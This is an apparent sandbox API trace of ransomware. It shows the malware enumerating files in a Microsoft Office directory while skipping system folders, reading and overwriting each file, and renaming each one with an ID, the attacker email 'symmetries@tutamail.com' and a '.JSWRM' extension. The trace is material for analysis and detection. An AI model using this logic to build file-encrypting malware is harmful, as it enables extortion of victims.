lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0118.693] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad18c6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x5cb7, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR14F.GIF", cAlternateFileName="")) returned 1 [0118.693] lstrcmpiW (lpString1="PDIR14F.GIF", lpString2=".") returned 1 [0118.693] lstrcmpiW (lpString1="PDIR14F.GIF", lpString2="..") returned 1 [0118.693] lstrcmpiW (lpString1="PDIR14F.GIF", lpString2="...") returned 1 [0118.693] lstrcmpiW (lpString1="PDIR14F.GIF", lpString2="windows") returned -1 [0118.693] lstrcmpiW (lpString1="PDIR14F.GIF", lpString2="recovery") returned -1 [0118.693] lstrcmpiW (lpString1="PDIR14F.GIF", lpString2="perflogs") returned -1 [0118.693] lstrcmpiW (lpString1="PDIR14F.GIF", lpString2="documents and settings") returned 1 [0118.693] lstrcmpiW (lpString1="PDIR14F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.693] lstrcmpiW (lpString1="PDIR14F.GIF", lpString2="system volume information") returned -1 [0118.693] lstrcmpiW (lpString1="PDIR14F.GIF", lpString2="msocache") returned 1 [0118.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0118.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR14F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR14F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR14F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0118.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0118.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR14F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR14F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR14F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0118.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0118.693] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0118.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.693] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0118.693] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR14F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir14f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.694] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=23735) returned 1 [0118.694] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.694] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5cb0) returned 0x24c1d0 [0118.694] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5cb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x5cb0, lpOverlapped=0x0) returned 1 [0118.698] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.698] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5cb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x5cb0, lpOverlapped=0x0) returned 1 [0118.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.698] CloseHandle (hObject=0x314) returned 1 [0118.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0118.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0118.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0118.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a258 [0118.698] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a258, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a258 | out: hHeap=0x1e0000) returned 1 [0118.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0118.698] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0118.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0118.698] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.698] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR14F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir14f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR14F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir14f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0118.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0118.699] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0118.699] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xacf29e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad18c6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1cb8, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR15F.GIF", cAlternateFileName="")) returned 1 [0118.699] lstrcmpiW (lpString1="PDIR15F.GIF", lpString2=".") returned 1 [0118.699] lstrcmpiW (lpString1="PDIR15F.GIF", lpString2="..") returned 1 [0118.699] lstrcmpiW (lpString1="PDIR15F.GIF", lpString2="...") returned 1 [0118.699] lstrcmpiW (lpString1="PDIR15F.GIF", lpString2="windows") returned -1 [0118.699] lstrcmpiW (lpString1="PDIR15F.GIF", lpString2="recovery") returned -1 [0118.699] lstrcmpiW (lpString1="PDIR15F.GIF", lpString2="perflogs") returned -1 [0118.699] lstrcmpiW (lpString1="PDIR15F.GIF", lpString2="documents and settings") returned 1 [0118.699] lstrcmpiW (lpString1="PDIR15F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.699] lstrcmpiW (lpString1="PDIR15F.GIF", lpString2="system volume information") returned -1 [0118.699] lstrcmpiW (lpString1="PDIR15F.GIF", lpString2="msocache") returned 1 [0118.699] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0118.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR15F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR15F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR15F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0118.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0118.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR15F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR15F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR15F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0118.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0118.700] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0118.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.700] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0118.700] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR15F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir15f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.700] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=7352) returned 1 [0118.700] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.700] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1cb0) returned 0x24c1d0 [0118.701] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x1cb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x1cb0, lpOverlapped=0x0) returned 1 [0118.703] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.703] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x1cb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x1cb0, lpOverlapped=0x0) returned 1 [0118.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.703] CloseHandle (hObject=0x314) returned 1 [0118.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0118.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0118.703] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.703] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0118.703] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0118.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0118.704] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0118.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0118.704] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0118.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0118.704] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0118.704] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR15F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir15f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR15F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir15f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0118.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0118.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0118.705] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad18c6e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad18c6e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad18c6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x399f, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR16F.GIF", cAlternateFileName="")) returned 1 [0118.705] lstrcmpiW (lpString1="PDIR16F.GIF", lpString2=".") returned 1 [0118.705] lstrcmpiW (lpString1="PDIR16F.GIF", lpString2="..") returned 1 [0118.705] lstrcmpiW (lpString1="PDIR16F.GIF", lpString2="...") returned 1 [0118.705] lstrcmpiW (lpString1="PDIR16F.GIF", lpString2="windows") returned -1 [0118.705] lstrcmpiW (lpString1="PDIR16F.GIF", lpString2="recovery") returned -1 [0118.705] lstrcmpiW (lpString1="PDIR16F.GIF", lpString2="perflogs") returned -1 [0118.705] lstrcmpiW (lpString1="PDIR16F.GIF", lpString2="documents and settings") returned 1 [0118.705] lstrcmpiW (lpString1="PDIR16F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.705] lstrcmpiW (lpString1="PDIR16F.GIF", lpString2="system volume information") returned -1 [0118.705] lstrcmpiW (lpString1="PDIR16F.GIF", lpString2="msocache") returned 1 [0118.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0118.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR16F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR16F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR16F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0118.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0118.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR16F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR16F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR16F.GIF", lpUsedDefaultChar=0x0) returned 11 [0118.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0118.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0118.705] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0118.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0118.705] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0118.705] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0118.705] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR16F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir16f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0118.706] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=14751) returned 1 [0118.706] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.706] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3990) returned 0x24c1d0 [0118.706] ReadFile (in: hFile=0x314, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x3990, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e534*=0x3990, lpOverlapped=0x0) returned 1 [0118.711] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0118.711] WriteFile (in: hFile=0x314, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x3990, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e530*=0x3990, lpOverlapped=0x0) returned 1 [0118.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0118.711] CloseHandle (hObject=0x314) returned 1 [0118.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0118.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0118.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0118.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0118.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0118.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0118.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0118.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0118.711] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0118.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0118.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0118.711] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0118.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0118.711] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0118.711] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR16F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir16f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR16F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir16f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0118.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0118.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0118.712] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0118.712] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xacf29e7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xacf29e7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad18c6e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2bb7, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR17F.GIF", cAlternateFileName="")) returned 1 [0118.712] lstrcmpiW (lpString1="PDIR17F.GIF", lpString2=".") returned 1 [0118.712] lstrcmpiW (lpString1="PDIR17F.GIF", lpString2="..") returned 1 [0118.712] lstrcmpiW (lpString1="PDIR17F.GIF", lpString2="...") returned 1 [0118.712] lstrcmpiW (lpString1="PDIR17F.GIF", lpString2="windows") returned -1 [0118.712] lstrcmpiW (lpString1="PDIR17F.GIF", lpString2="recovery") returned -1 [0118.712] lstrcmpiW (lpString1="PDIR17F.GIF", lpString2="perflogs") returned -1 [0118.712] lstrcmpiW (lpString1="PDIR17F.GIF", lpString2="documents and settings") returned 1 [0118.712] lstrcmpiW (lpString1="PDIR17F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0118.713] lstrcmpiW (lpString1="PDIR17F.GIF", lpString2="system volume information") returned -1 [0118.713] lstrcmpiW (lpString1="PDIR17F.GIF", lpString2="msocache") returned 1 [0118.713] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0118.713] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR17F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0118.713] WideCharToMultiByte 